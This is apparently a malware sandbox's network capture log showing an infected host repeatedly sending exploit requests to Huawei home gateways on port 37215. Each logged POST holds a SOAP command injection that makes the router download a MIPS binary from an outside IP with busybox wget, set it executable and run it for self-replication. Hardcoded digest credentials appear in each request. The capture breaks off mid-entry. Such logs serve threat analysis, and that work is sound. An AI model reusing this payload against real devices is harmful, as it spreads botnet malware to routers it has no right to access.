3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1303192.168.2.1336686204.14.203.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535293102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1304192.168.2.1355506218.96.97.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535423040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1305192.168.2.1358058138.4.181.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535640955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1306192.168.2.1342532194.133.28.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535667896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1307192.168.2.1337472217.72.75.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535763025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1308192.168.2.1342236149.40.152.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535825014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1309192.168.2.135839241.2.120.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535842896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1310192.168.2.1333984157.48.168.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535873890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1311192.168.2.135008641.102.133.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535991907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1312192.168.2.135274019.127.170.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536103010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1313192.168.2.1341914110.247.164.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536128998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
